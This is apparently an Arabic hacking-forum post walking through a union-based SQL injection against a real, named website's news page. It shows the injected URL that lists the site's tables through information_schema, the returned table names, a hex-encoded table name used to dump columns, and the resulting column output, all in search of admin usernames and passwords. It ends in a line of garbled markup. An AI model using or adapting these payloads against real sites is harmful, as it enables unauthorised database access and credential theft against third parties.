في هيك مشكله بنجرب الدرس 17
انا جربت الخطوه الاولى
كود PHP:
http://www.cumbredecanpomeranias.com/noticias.php?id=33+and+1=0+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables
وبعد كده يطلع هذا
كود PHP:
albumes,
cachorros,
********os,
enlaces,
exposiciones,
fotos,
librovisitas_php
,noticias
,perros
,tipos_********os,
visitas,
ولا واحد منهم له علاقه ببيانات باسورد وادمن من الشكل الظاهري
اذا انت بدك الموقع وخايف يمر عليك شيء بتفتشهم كلهم كيف افتشهم هيك
بنمسك الاول ونشفره
0ْx616C62756D6573
خلينا نتابع
تمام طلع لنا
| | | | | |
albumes:id:cumbredebbdd
,albumes:album:cumbredebbdd,
albumes:id:cumbredebbdd-n,
albumes:album:cumbredebbdd-n
,albumes:id:cumbredebbdd-s,
albumes:album:cumbredebbdd-s | |  | |  | |
زي ما انت شايف فش فيهم باسورد ولا يوزر
كلها
id albom
وهذا سبب حصول الخطا لما نضع امر البحث عن الباسورد
انه فش كلمه اسمها
pass
موففق
Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC